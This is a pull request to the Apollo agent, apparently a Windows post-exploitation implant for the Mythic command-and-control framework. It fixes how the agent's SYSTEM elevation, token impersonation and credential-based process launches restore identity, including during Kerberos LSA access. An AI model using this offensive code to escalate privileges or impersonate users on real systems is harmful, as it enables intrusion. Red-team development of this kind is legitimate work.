### PR TITLE
More identity fixes

### DIFF
--- a/Payload_Type/apollo/CHANGELOG.MD
+++ b/Payload_Type/apollo/CHANGELOG.MD
@@ -4,6 +4,16 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [v2.4.16] - 2026-07-02
+
+### Changed
+
+- Sacrificial process - stopped passing LOGON_NETCREDENTIALS_ONLY to CreateProcessWithTokenW unconditionally. Instead, launch the child with the current primary token
+- Sacrificial process - use LOGON_NETCREDENTIALS_ONLY in the fallback scenario when the original credential was actually created as net-only
+- Inline assembly execution started new thread but was not applying correct impersonation token
+- Fix system impersonation not restoring correct identity
+
+
 ## [v2.4.15] - 2026-04-30
 
 ### Changed

--- a/Payload_Type/apollo/apollo/agent_code/Apollo/Management/Identity/IdentityManager.cs
+++ b/Payload_Type/apollo/apollo/agent_code/Apollo/Management/Identity/IdentityManager.cs
@@ -432,6 +432,36 @@ public class IdentityManager : IIdentityManager
         }
     }
 
+    public bool RunAsSystem(Action<WindowsIdentity> action)
+    {
+        if (action == null)
+            throw new ArgumentNullException(nameof(action));
+
+        lock (_identitySync)
+        {
+            var savedPrimaryIdentity = _currentPrimaryIdentity;
+            var savedImpersonationIdentity = _currentImpersonationIdentity;
+            var wasImpersonating = _isImpersonating;
+            var savedUserCredential = _userCredential;
+
+            try
+            {
+                if (!GetSystem())
+                    return false;
+
+                action(_currentImpersonationIdentity);
+                return true;
+            }
+            finally
+            {
+                _currentPrimaryIdentity = savedPrimaryIdentity;
+                _currentImpersonationIdentity = savedImpersonationIdentity;
+                _isImpersonating = wasImpersonating;
+                _userCredential = savedUserCredential;
+            }
+        }
+    }
+
     public void Revert()
     {
         lock (_identitySync)

--- a/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Interfaces/IIdentityManager.cs
+++ b/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Interfaces/IIdentityManager.cs
@@ -29,6 +29,7 @@ namespace ApolloInterop.Interfaces
         bool IsOriginalIdentity();
 
         bool GetSystem();
+        bool RunAsSystem(Action<WindowsIdentity> action);
 
     }
 }

--- a/Payload_Type/apollo/apollo/agent_code/KerberosTickets/KerberosHelpers.cs
+++ b/Payload_Type/apollo/apollo/agent_code/KerberosTickets/KerberosHelpers.cs
@@ -21,7 +21,7 @@ namespace KerberosTickets;
 
 internal class KerberosHelpers
 {
-    private static HANDLE systemHandle { get; set; }
+    // Removed systemHandle cache: `systemHandle = new()` was always IsNull, so it never hit.
 
     private static List<Artifact> createdArtifacts = new List<Artifact>();
 
@@ -34,29 +34,37 @@ internal class KerberosHelpers
         HANDLE lsaHandle = new();
         try
         {
-            bool elevated = false;
             DebugHelp.DebugWriteLine("Getting LSA Handle");
             //if we are already high integrity, we need to elevate to system to get the handle to all the sessions
             if(Agent.GetIdentityManager().GetIntegrityLevel() is IntegrityLevel.HighIntegrity && elevateToSystem)
             {
-                //if we have a system handle already, we can use that
-                if(systemHandle.IsNull is false)
-                {
-                    elevated = true;
-                }
-                else
-                {
-                    elevated = Agent.GetIdentityManager().GetSystem();
-                    createdArtifacts.Add(Artifact.PrivilegeEscalation("SYSTEM"));
-                }
+                // Snapshot identity: GetSystem() permanently overwrites primary+impersonation
+                // identity with winlogon, leaking SYSTEM into every later command.
+                var savedImpersonation = Agent.GetIdentityManager().GetCurrentImpersonationIdentity();
+                var savedPrimary = Agent.GetIdentityManager().GetCurrentPrimaryIdentity();
+                bool wasOriginalIdentity = Agent.GetIdentityManager().IsOriginalIdentity();
+
+                bool elevated = Agent.GetIdentityManager().GetSystem();
+                createdArtifacts.Add(Artifact.PrivilegeEscalation("SYSTEM"));
                 if (elevated)
                 {
-                    systemHandle = new();
                     ImpersonationScope.Run(Agent.GetIdentityManager().GetCurrentImpersonationIdentity(), () =>
                     {
                         WindowsAPI.LsaConnectUntrustedDelegate(out lsaHandle);
                     });
                     createdArtifacts.Add(Artifact.WindowsAPIInvoke("LsaConnectUntrusted"));
+
+                    // Restore pre-call identity. Revert() if there was no impersonation
+                    // (clears _isImpersonating); otherwise put back the saved identities.
+                    if (wasOriginalIdentity)
+                    {
+                        Agent.GetIdentityManager().Revert();
+                    }
+                    else
+                    {
+                        Agent.GetIdentityManager().SetImpersonationIdentity(savedImpersonation);
+                        Agent.GetIdentityManager().SetPrimaryIdentity(savedPrimary);
+                    }
                 }
                 else
                 {

--- a/Payload_Type/apollo/apollo/agent_code/KerberosTickets/KerberosHelpers.cs
+++ b/Payload_Type/apollo/apollo/agent_code/KerberosTickets/KerberosHelpers.cs
@@ -38,33 +38,17 @@ internal class KerberosHelpers
             //if we are already high integrity, we need to elevate to system to get the handle to all the sessions
             if(Agent.GetIdentityManager().GetIntegrityLevel() is IntegrityLevel.HighIntegrity && elevateToSystem)
             {
-                // Snapshot identity: GetSystem() permanently overwrites primary+impersonation
-                // identity with winlogon, leaking SYSTEM into every later command.
-                var savedImpersonation = Agent.GetIdentityManager().GetCurrentImpersonationIdentity();
-                var savedPrimary = Agent.GetIdentityManager().GetCurrentPrimaryIdentity();
-                bool wasOriginalIdentity = Agent.GetIdentityManager().IsOriginalIdentity();
-
-                bool elevated = Agent.GetIdentityManager().GetSystem();
-                createdArtifacts.Add(Artifact.PrivilegeEscalation("SYSTEM"));
-                if (elevated)
+                bool elevated = Agent.GetIdentityManager().RunAsSystem(systemIdentity =>
                 {
-                    ImpersonationScope.Run(Agent.GetIdentityManager().GetCurrentImpersonationIdentity(), () =>
+                    ImpersonationScope.Run(systemIdentity, () =>
                     {
                         WindowsAPI.LsaConnectUntrustedDelegate(out lsaHandle);
                     });
+                });
+                createdArtifacts.Add(Artifact.PrivilegeEscalation("SYSTEM"));
+                if (elevated)
+                {
                     createdArtifacts.Add(Artifact.WindowsAPIInvoke("LsaConnectUntrusted"));
-
-                    // Restore pre-call identity. Revert() if there was no impersonation
-                    // (clears _isImpersonating); otherwise put back the saved identities.
-                    if (wasOriginalIdentity)
-                    {
-                        Agent.GetIdentityManager().Revert();
-                    }
-                    else
-                    {
-                        Agent.GetIdentityManager().SetImpersonationIdentity(savedImpersonation);
-                        Agent.GetIdentityManager().SetPrimaryIdentity(savedPrimary);
-                    }
                 }
                 else
                 {

--- a/Payload_Type/apollo/apollo/agent_code/Process/SacrificialProcess.cs
+++ b/Payload_Type/apollo/apollo/agent_code/Process/SacrificialProcess.cs
@@ -547,7 +547,9 @@ namespace Process
             }
             else
             {
-                return StartWithCredentials(_agent.GetIdentityManager().GetCurrentImpersonationIdentity().Token);
+                return StartWithCredentials(
+                    _agent.GetIdentityManager().GetCurrentPrimaryIdentity().Token,
+                    GetCurrentLogonInformation());
             }
             if (!bRet)
                 throw new Win32Exception(Marshal.GetLastWin32Error());
@@ -737,14 +739,34 @@ namespace Process
                 {
                     _pCloseHandle(hToken);
                 };
-                return StartWithCredentials(hToken);
+                return StartWithCredentials(hToken, logonInfo);
             }
         }
 
         public override bool StartWithCredentials(IntPtr hToken)
         {
+            return StartWithCredentials(hToken, GetCurrentLogonInformation());
+        }
+
+        private ApolloLogonInformation? GetCurrentLogonInformation()
+        {
+            return _agent.GetIdentityManager().GetCurrentLogonInformation(out ApolloLogonInformation logonInfo)
+                ? logonInfo
+                : (ApolloLogonInformation?)null;
+        }
+
+        private static LogonFlags GetCredentialLogonFlags(ApolloLogonInformation? logonInfo)
+        {
+            return logonInfo?.NetOnly == true
+                ? LogonFlags.LOGON_NETCREDENTIALS_ONLY
+                : LogonFlags.NONE;
+        }
+
+        private bool StartWithCredentials(IntPtr hToken, ApolloLogonInformation? logonInfo)
+        {
             int dwError;
             var bRet = false;
+            LogonFlags credentialLogonFlags = GetCredentialLogonFlags(logonInfo);
 
             DebugHelp.DebugWriteLine($"calling InitializeStartupEnvironment");
             if (_agent.GetIdentityManager().GetOriginal().Name != _agent.GetIdentityManager().GetCurrentPrimaryIdentity().Name)
@@ -789,7 +811,8 @@ namespace Process
                     DebugHelp.DebugWriteLine("Failed to create process as user. Attempting to create process with token.");
                     bRet = _pCreateProcessWithTokenW(
                         hToken,
-                        LogonFlags.LOGON_NETCREDENTIALS_ONLY,
+                        // Preserve the supplied token's LUID. NETCREDENTIALS_ONLY creates a new LSA session.
+                        LogonFlags.NONE,
                         null,
                         CommandLine,
                         _processFlags,
@@ -802,15 +825,15 @@ namespace Process
 
                     if (!bRet && (dwError == 1314))
                     {
-                        if (_agent.GetIdentityManager().GetCurrentLogonInformation(out ApolloLogonInformation cred))
+                        if (logonInfo.HasValue)
                         {
+                            ApolloLogonInformation cred = logonInfo.Value;
                             DebugHelp.DebugWriteLine("Failed to create process with token. Attempting to create process with logon.");
                             bRet = _pCreateProcessWithLogonW(
                                 cred.Username,
                                 cred.Domain,
                                 cred.Password,
-                                //LogonFlags.NONE, //Atm I am getting error 142 but using NETCREDENTIALS_ONLY gives no error
-                                LogonFlags.LOGON_NETCREDENTIALS_ONLY,
+                                credentialLogonFlags,
                                 null,
                                 CommandLine,
                                 _processFlags,

--- a/Payload_Type/apollo/apollo/agent_code/Tasks/inline_assembly.cs
+++ b/Payload_Type/apollo/apollo/agent_code/Tasks/inline_assembly.cs
@@ -20,6 +20,7 @@ using System.Reflection;
 using System.Runtime.CompilerServices;
 using System.Security.Principal;
 using ApolloInterop.Classes.Api;
+using ApolloInterop.Classes.Impersonation;
 using ApolloInterop.Utils;
 
 namespace Tasks
@@ -252,7 +253,8 @@ namespace Tasks
             AppDomain isolationDomain = AppDomain.CreateDomain(Guid.NewGuid().ToString());
             try
             {
-                isolationDomain.SetThreadPrincipal(new WindowsPrincipal(_agent.GetIdentityManager().GetCurrentImpersonationIdentity()));
+                WindowsIdentity impersonationIdentity = _agent.GetIdentityManager().GetCurrentImpersonationIdentity();
+                isolationDomain.SetThreadPrincipal(new WindowsPrincipal(impersonationIdentity));
                 isolationDomain.SetData("str", sParams);
                 bool defaultDomain = AppDomain.CurrentDomain.IsDefaultAppDomain();
                 // Load dependencies wrapped into a try catch to avoid non critical loading failures from causing the entire module to fail
@@ -315,7 +317,10 @@ namespace Tasks
                 {
                     _assemblyThread = new Thread(() =>
                     {
-                        isolationDomain.DoCallBack(sleeve);
+                        ImpersonationScope.Run(impersonationIdentity, () =>
+                        {
+                            isolationDomain.DoCallBack(sleeve);
+                        });
                     });
                     _assemblyThread.Start();
                     while (!_completed && !_cancellationToken.IsCancellationRequested)

--- a/Payload_Type/apollo/apollo/mythic/agent_functions/builder.py
+++ b/Payload_Type/apollo/apollo/mythic/agent_functions/builder.py
@@ -140,7 +140,7 @@ class Apollo(PayloadType):
     supported_os = [
         SupportedOS.Windows
     ]
-    semver = "2.4.15"
+    semver = "2.4.16"
     wrapper = False
     wrapped_payloads = ["scarecrow_wrapper", "service_wrapper"]
     c2_profiles = ["http", "httpx", "smb", "tcp", "websocket", "azure_blob"]


### PR DESCRIPTION
- Sacrificial process - stopped passing LOGON_NETCREDENTIALS_ONLY to CreateProcessWithTokenW unconditionally. Instead, launch the child with the current primary token
- Sacrificial process - use LOGON_NETCREDENTIALS_ONLY in the fallback scenario when the original credential was actually created as net-only
- Inline assembly execution started new thread but was not applying correct impersonation token
- Fix system impersonation not restoring correct identity